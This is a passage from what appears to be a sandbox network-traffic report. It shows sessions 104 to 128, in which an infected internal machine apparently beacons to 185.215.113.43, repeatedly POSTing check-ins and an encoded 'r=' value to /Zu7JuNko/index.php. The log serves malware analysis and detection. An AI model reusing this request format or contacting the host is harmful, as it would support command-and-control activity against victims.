Dec 13, 2024 18:58:22.995206118 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:24.399739981 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.7	50264	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:26.044321060 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:27.560354948 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.7	50267	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:29.302194118 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:30.634493113 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.7	50278	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:32.300502062 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:33.636265993 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.7	50288	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:35.382775068 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:36.763765097 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.7	50312	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:38.401870012 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:39.748846054 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.7	50322	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:41.499839067 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:42.831300974 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.7	50332	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:44.464457989 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:45.802428007 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.7	50345	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:47.584846973 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:48.920250893 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.7	50352	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:50.544847965 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:51.892540932 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.7	50363	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:53.630958080 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:54.973189116 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.7	50373	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:56.614042044 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:57.960998058 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.7	50378	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:59.712203979 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:01.044671059 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.7	50387	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:02.671854019 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:04.012089014 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.7	50394	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:05.766863108 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:07.109899998 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.7	50399	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:08.744915009 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:10.080809116 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.7	50402	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:11.821356058 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:13.154995918 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.7	50403	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:14.789499044 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:16.384098053 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.7	50406	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:18.156229973 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:19.535535097 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.7	50408	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:21.174529076 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:22.511389971 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.7	50409	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:24.267667055 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:25.599230051 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.7	50410	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:27.225512028 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:28.580615044 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.7	50411	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:30.329307079 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:31.669783115 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.7	50413	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:33.302865028 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:34.868674040 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.7	50414	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:36.840939045 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:38.182423115 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.7	50416	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
